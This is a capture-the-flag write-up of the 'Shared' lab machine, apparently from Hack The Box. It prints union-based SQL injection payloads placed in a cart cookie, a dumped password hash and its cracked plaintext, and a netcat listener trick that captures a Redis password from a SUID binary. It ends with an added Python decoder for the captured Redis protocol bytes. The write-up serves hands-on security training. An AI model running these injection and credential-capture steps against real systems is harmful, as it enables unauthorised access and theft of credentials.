Shared
{image of site}
nmap
Foothold
PrestaShop
Messing with the cart cookie on checkout.shared.htb shows that we can adjust the cart purely from the cookie. Maybe it's injectable?

Verified that we can obscure this cookie as well

We verified that we have a union-based SQL injection

Let's try to exploit that to see the database
{"562XZDU8' and 0=1 union select '1',database(),'3'-- -":"1"}

Now let's see the tables
{"562XZDU8' and 0=1 union select '1',table_name,'3' from information_schema.tables where table_schema='checkout'-- -":"1"}

Let's see the columns
{"562XZDU8' and 0=1 union select '1',column_name,'3' from information_schema.columns where table_name = 'checkout'-- -":"1"}
Thomas
{"53GG2EF8' and 0=1 union select 'A',group_concat(column_name separator '|') ,'c' from information_schema.columns where table_name = 'user'-- -":"1"}

Which doesn't work, so let's try a few basic column names in checkout.user
{"562XZDU8' and 0=1 union select '1',username,'3' from checkout.user-- -":"1"}
james_mason
{"562XZDU8' and 0=1 union select '1',password,'3' from checkout.user-- -":"1"}
fc895d4eddc2fc12f995e18c865cf273
Send that to CrackStation
Soleil101
Now we're in the box

We see in /etc/passwd that we have another user, dan_smith.
Groups:

We identify the DB as MariaDB.
Ports open on the machine

We find an empty directory for developers.

Let's see if we can get a SUID file to execute in there.
Root Escalation
Found access to /usr/local/bin/redis_connector_dev through linpeas.
Ran it on the box:
dan_smith@shared:~$ ./redis_connector_dev
[+] Logging to redis instance using password...
INFO command result:
# Server
redis_version:6.0.15
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:4610f4c3acf7fb25
redis_mode:standalone
os:Linux 5.10.0-16-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:10.2.1
process_id:126902
run_id:e27d809758a3bf29b180cc83099973308f720da1
tcp_port:6379
uptime_in_seconds:52
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:3135455
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
io_threads_active:0
<nil>
Then ran it locally with netcat listening on 6379, so the binary's connection to Redis lands on our listener and shows what it sends:
nc -lvnp 6379
listening on [any] 6379 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 44892
*2
$4
auth
$16
F2WHqJUz2WEz=Gqq
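To read what the listener captured above, here is an added RESP (Redis protocol) decoder; it is not part of the original writeup, and the sample bytes are constructed from the capture shown.

```python
# Constructed sample of the bytes the netcat listener above receives: the
# RESP encoding of "AUTH <password>" as an array of two bulk strings. The
# password value is the one captured on the page.
CAPTURED = b"*2\r\n$4\r\nauth\r\n$16\r\nF2WHqJUz2WEz=Gqq\r\n"


def parse_resp(buf: bytes, pos: int = 0):
    """Parse one RESP2 value at buf[pos]; return (value, position after it).

    Simple string (+) -> str, error (-) -> ValueError instance (not raised),
    integer (:) -> int, bulk string ($) -> str or None, array (*) -> list or None.
    """
    end = buf.index(b"\r\n", pos)
    prefix, line = buf[pos:pos + 1], buf[pos + 1:end]
    pos = end + 2
    if prefix == b"+":
        return line.decode(), pos
    if prefix == b"-":
        return ValueError(line.decode()), pos
    if prefix == b":":
        return int(line), pos
    if prefix == b"$":
        length = int(line)
        if length == -1:            # null bulk string
            return None, pos
        data = buf[pos:pos + length]
        if buf[pos + length:pos + length + 2] != b"\r\n":
            raise ValueError("bulk string not terminated by CRLF")
        return data.decode(), pos + length + 2
    if prefix == b"*":
        count = int(line)
        if count == -1:             # null array
            return None, pos
        items = []
        for _ in range(count):
            item, pos = parse_resp(buf, pos)
            items.append(item)
        return items, pos
    raise ValueError(f"unknown RESP type prefix {prefix!r}")


def commands_from_capture(buf: bytes):
    """Split a captured client->server stream into the command arrays it carries."""
    pos, cmds = 0, []
    while pos < len(buf):
        cmd, pos = parse_resp(buf, pos)
        cmds.append(cmd)
    return cmds
```

Running `commands_from_capture(CAPTURED)` on the bytes from the listener yields `[['auth', 'F2WHqJUz2WEz=Gqq']]`, which is why a privileged helper that embeds its own Redis password and connects to whatever answers on the port is a credential disclosure.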